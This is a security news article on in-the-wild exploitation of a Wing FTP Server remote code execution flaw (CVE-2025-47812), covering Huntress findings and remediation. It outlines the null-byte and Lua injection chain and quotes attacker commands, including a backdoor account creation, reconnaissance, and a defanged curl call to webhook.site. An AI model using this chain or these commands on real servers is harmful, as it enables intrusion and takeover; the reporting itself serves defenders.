Critical Wing FTP Server RCE (CVE-2025-47812) Actively Exploited In The Wild
Do Son 
On July 1, 2025—just a day after its public disclosure—Huntress witnessed the active exploitation of a critical remote code execution (RCE) vulnerability in Wing FTP Server. Tracked as CVE-2025-47812, this flaw combines the potency of null byte injection and Lua code execution to deliver root or SYSTEM-level access to attackers.
At the heart of the flaw is how Wing FTP mishandles null bytes in the username parameter, particularly in requests to loginok.html, which is responsible for handling authentication. Huntress explains:
“An attacker can perform Lua injection after using the null byte in the username parameter,” disrupting string processing and allowing injection of malicious code.
The exploit chain involves logging in (even anonymously), appending a %00 null byte to the username, injecting Lua code, and then triggering deserialization by visiting another page like dir.html. The result? Arbitrary code execution via session manipulation.
Huntress analysts first spotted the exploit in the wild on July 1, 2025. Using their telemetry and EDR tooling, they observed exploitation under the WFTPServer.exe process. Evidence was found in session files and log entries—such as this truncated line in the logs:
User ‘anonymous
“Note the missing closing quote—this is the null-byte breaking the entry in the log file.”
But the clear evidence came from tampered Lua session files. One such file included this payload:
Once decoded, the hex-encoded blob revealed the attacker’s true intent:
This command downloads and executes malware on the victim host, leveraging certutil.
The attack timeline is a case study in both persistence and amateur mistakes. Huntress observed at least five different threat actors targeting the same vulnerable system within a single day. Commands like net user wingftp 123123qweqwe /add were used to create new users, while reconnaissance activity included:
- ipconfig
- arp -a
- whoami /priv
- curl -s -d con https://webhook[.]site/…
One attacker even typed c:^A.exe, accidentally injecting a SOH (Start of Heading) control character into their command—effectively sabotaging their own payload. Huntress quipped:
“It’s unclear how or why they even managed to type that out.”
Despite their comedic errors, the threat remained real. Eventually, one attacker tried to install ScreenConnect for persistent access. Fortunately, Microsoft Defender intervened, flagging and deleting the file as Trojan:Win32/Ceprolad.A, shortly before WFTPServer.exe crashed—bringing the attack to a halt.
Wing FTP Server versions prior to 7.4.4 are vulnerable. If you’re running this software:
- Update immediately to version 7.4.4 or newer.
- Review log files in: C:\Program Files (x86)\Wing FTP Server\Log\Domains\
- Audit session files in: C:\Program Files (x86)\Wing FTP Server\session\
Pay close attention to session files with anomalous sizes or embedded Lua functions.
Related Posts:
- CVSS 10 RCE in Wing FTP Server (CVE-2025-47812) Allows Full Server Takeover, PoC Releases
- Global Malware Campaign Exploits Lua in Gaming and Education Sectors
- CVE-2024-27102 (CVSS 9.9) Vulnerability Threatens Pterodactyl Game Servers
- With null characters, Malicious code bypassed security checking in Windows 10
- ScreenConnect Abuse: Hackers Leverage Remote Access Tool for Healthcare Intrusion
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
